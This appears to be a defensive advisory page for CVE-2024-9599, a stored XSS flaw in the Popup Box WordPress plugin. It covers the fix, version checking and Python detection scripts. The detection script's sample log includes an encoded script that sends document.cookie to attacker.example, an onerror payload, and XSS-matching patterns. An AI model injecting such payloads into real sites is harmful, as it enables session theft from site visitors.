CVE-2024-9599
📋 TL;DR
The Popup Box WordPress plugin before version 4.7.8 does not sanitise and escape some of its settings, which allows high-privilege users such as administrators to store cross-site scripting (XSS) payloads in those settings. The injected script runs in the browser of anyone who views the affected output. The attack works even where the unfiltered_html capability is disallowed (for example in a WordPress multisite network), which is the capability that normally decides whether an administrator may post raw HTML at all. Only WordPress sites running a vulnerable version of this specific plugin are affected.
💻 Affected Systems
- Popup Box WordPress plugin, versions before 4.7.8
📦 What is this software?
Popup Box by Ays Pro
⚠️ Risk & Real-World Impact
Worst Case
An attacker who already holds an administrator account, or a site administrator in a multisite network who is otherwise denied unfiltered_html, stores JavaScript that steals session cookies, redirects visitors to phishing sites, or performs actions in the browsers of other logged-in users. Because the script runs for whoever views the affected output, including more privileged users such as a network super admin, the attacker's reach can extend beyond what their own account permits, up to full compromise of the site.
Likely Case
A malicious administrator, or an attacker who has compromised an administrator account, stores tracking scripts, defaces content, or harvests session data from visitors and other logged-in users who view pages where the popup is rendered.
If Mitigated
Where administrator accounts are well protected (strong authentication, as few administrators as possible, and review of who holds the role on each site in a multisite network), the flaw is not reachable, since exploitation requires administrator privileges.
🎯 Exploit Status
Exploitation requires an authenticated administrator account on the WordPress site. The root cause is that certain plugin settings are stored and rendered without sanitisation or escaping.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 4.7.8
Advisory (WPScan): https://wpscan.com/vulnerability/9e8a2659-7a6c-4528-b0b2-64d462485b43/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the 'Popup Box' plugin.
4. Click 'Update Now' if an update is available.
5. Alternatively, download version 4.7.8 or later from the WordPress.org plugin repository and update manually.
🔧 Temporary Workarounds
Remove vulnerable plugin
Temporarily deactivate or remove the Popup Box plugin until it can be updated (deactivation alone is enough to stop the stored script from rendering; deletion also removes the plugin files):
wp plugin deactivate popup-box
wp plugin delete popup-box
Restrict admin access
Implement strict access controls and monitoring for administrator accounts, and review which accounts hold the administrator role on each site.
🧯 If You Can't Patch
- Monitor administrator activity and every change to plugin settings closely, and review the popup content already stored in the plugin's settings for script tags, javascript: URIs, or inline event handlers
- Use web application firewall (WAF) rules to block XSS payloads in POST requests to admin-ajax.php and the plugin settings pages; treat this as defence in depth only, since string-matching rules are bypassed by encoding and the requests come from an authenticated administrator
🔍 How to Verify
Check if Vulnerable:
Open WordPress admin → Plugins → Installed Plugins and read the Popup Box version. Any version below 4.7.8 is vulnerable.
Check Version:
wp plugin get popup-box --field=version
Verify Fix Applied:
Confirm that the Popup Box plugin version shown in the WordPress admin panel (or returned by the wp-cli command above) is 4.7.8 or higher.
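The comparison behind "below 4.7.8" is easy to get wrong when scripted, because a plain string compare ranks 4.7.10 below 4.7.8. The following is an added example, not code from the advisory or from Ays Pro: it compares a version string numerically against the fixed release and, for hosts without wp-cli, reads the Version field from a WordPress plugin file header. The header text is a constructed sample; the plugin's real main file name and contents are not given on this page.

```python
"""Version check for CVE-2024-9599 (added example, not from the advisory)."""
import re
from typing import Optional

FIXED_VERSION = "4.7.8"  # first fixed release named on the page

# Constructed sample of a WordPress plugin file header; the real main file
# name and its contents are not given on the page, so this is illustrative.
SAMPLE_PLUGIN_HEADER = """<?php
/**
 * Plugin Name: Popup Box
 * Description: Constructed sample header for illustration.
 * Version: 4.7.7
 * Author: Ays Pro
 */
"""


def parse_version(version: str) -> tuple:
    """Convert '4.7.10' to (4, 7, 10) so that comparison is numeric.

    A plain string comparison would rank '4.7.10' below '4.7.8'. Trailing
    non-numeric labels such as '-beta' are ignored.
    """
    parts = []
    for piece in version.strip().split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    return tuple(parts)


def is_vulnerable(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """Apply the page's rule: any version below 4.7.8 is vulnerable."""
    return parse_version(installed) < parse_version(fixed)


def plugin_header_version(header_text: str) -> Optional[str]:
    """Read the 'Version:' field from a WordPress plugin header block.

    WordPress reads this header itself, so the value is what the admin
    screen shows; useful when wp-cli is not available on the host.
    """
    match = re.search(r"^\s*\*?\s*Version:\s*(\S+)", header_text, re.MULTILINE)
    return match.group(1) if match else None


if __name__ == "__main__":
    # Typical use: pipe the output of `wp plugin get popup-box --field=version`
    # into this script, or cat the plugin's main .php file into it. With no
    # stdin, the constructed sample header is checked instead.
    import sys
    source = SAMPLE_PLUGIN_HEADER if sys.stdin.isatty() else sys.stdin.read()
    version = plugin_header_version(source) or source.strip()
    state = "VULNERABLE" if is_vulnerable(version) else "patched"
    print(f"Popup Box {version}: {state} (fixed in {FIXED_VERSION})")
```

Run as `wp plugin get popup-box --field=version | python3 check_popup_box.py` (the script name is arbitrary). A result of "patched" only means the installed version is at or above 4.7.8; it does not clean up any payload an administrator stored while the site was vulnerable, so the stored settings should still be reviewed.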
📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to admin-ajax.php with script tags in parameters
- Admin user modifying popup box settings with JavaScript payloads
- Changes to popup-box plugin settings from unexpected IP addresses
Network Indicators:
- POST requests containing script tags to /wp-admin/admin-ajax.php with action parameters related to popup box
SIEM Query (plain string match; URL-encoded or mixed-case payloads such as %3Cscript%3E or <ScRiPt> will not match, so decode the request fields first where the SIEM supports it):
source="wordpress.log" AND ("popup-box" OR "admin-ajax.php") AND ("<script>" OR "javascript:" OR "onerror=" OR "onload=")
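The indicators above only fire on literal strings, which a one-layer or double URL encoding defeats. The following is an added example, not code from the advisory: it applies the same indicators to the decoded request and scopes them to POSTs against WordPress settings-save endpoints. The log events are constructed JSON lines in the shape a WAF or audit log that records request bodies might emit; the parameter names and the inclusion of options.php and admin-post.php alongside admin-ajax.php are assumptions, since the plugin's real action and option names are not on this page.

```python
"""Detection for CVE-2024-9599-style settings writes (added example, constructed data)."""
import html
import json
import re
from urllib.parse import unquote, unquote_plus

# Paths a plugin's settings form usually POSTs to. The page names admin-ajax.php;
# options.php and admin-post.php are the other standard WordPress settings-save
# endpoints and are an assumption here, not taken from the advisory.
ADMIN_WRITE_ENDPOINTS = (
    "/wp-admin/admin-ajax.php",
    "/wp-admin/options.php",
    "/wp-admin/admin-post.php",
)

# The same indicators as the page's SIEM query, applied case-insensitively to
# the decoded request so encoded payloads are not missed. Treat a hit as a lead
# for review, not proof: a parameter like "online=1" also matches the handler rule.
XSS_PATTERN = re.compile(r"<\s*script\b|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)

# Constructed sample events (JSON lines). Addresses come from the documentation
# ranges; the parameter names are made up, since the plugin's real field names
# are not given on the page. Line 3 carries a double-encoded payload.
SAMPLE_LOG = """\
{"line": 1, "src_ip": "203.0.113.7", "user": "siteadmin", "method": "POST", "uri": "/wp-admin/options.php", "body": "option_page=popup_box_settings&popup_title=Summer+Sale&_wpnonce=abc123"}
{"line": 2, "src_ip": "198.51.100.23", "user": "siteadmin", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=popup_save&popup_content=%3Cscript%3Efetch(%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie)%3C%2Fscript%3E"}
{"line": 3, "src_ip": "198.51.100.23", "user": "siteadmin", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "body": "action=popup_save&popup_content=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E"}
{"line": 4, "src_ip": "203.0.113.9", "user": "-", "method": "GET", "uri": "/wp-admin/admin-ajax.php?action=popup_load&id=3", "body": ""}
{"line": 5, "src_ip": "203.0.113.9", "user": "-", "method": "POST", "uri": "/wp-comments-post.php", "body": "comment=%3Cscript%3Ealert(1)%3C%2Fscript%3E"}
"""


def normalize(value: str, rounds: int = 3) -> str:
    """Undo form encoding, then up to `rounds` further layers of percent
    encoding (double encoding is a common way past string-matching rules),
    then HTML entities."""
    value = unquote_plus(value)
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return html.unescape(value)


def is_settings_write(event: dict) -> bool:
    """POST to one of the settings-save endpoints (query string ignored)."""
    path = event["uri"].partition("?")[0]
    return event["method"] == "POST" and path in ADMIN_WRITE_ENDPOINTS


def detect(events) -> list:
    """Return one finding per settings write whose decoded parameters carry a
    script indicator and mention the popup plugin."""
    hits = []
    for ev in events:
        if not is_settings_write(ev):
            continue
        query = ev["uri"].partition("?")[2]
        payload = normalize(query + "&" + ev.get("body", ""))
        # Scope to this plugin by a loose substring match (assumption: the
        # real action/option names are not given on the page).
        if "popup" not in payload.lower():
            continue
        match = XSS_PATTERN.search(payload)
        if match:
            hits.append({
                "line": ev["line"],
                "user": ev["user"],
                "src_ip": ev["src_ip"],
                "uri": ev["uri"],
                "evidence": match.group(0),
            })
    return hits


def load_events(text: str) -> list:
    """Parse JSON-lines log text into event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


if __name__ == "__main__":
    for hit in detect(load_events(SAMPLE_LOG)):
        print(f"line {hit['line']}: {hit['user']}@{hit['src_ip']} -> {hit['uri']} ({hit['evidence']!r})")
```

Against the sample, lines 2 and 3 are reported while line 1 (a benign settings save), line 4 (a GET) and line 5 (a comment form outside the admin endpoints) are not. The literal SIEM query above would miss line 3 entirely. Because the writer is an authenticated administrator, the useful follow-up is who made the change and from where, which is why the finding carries user and source address.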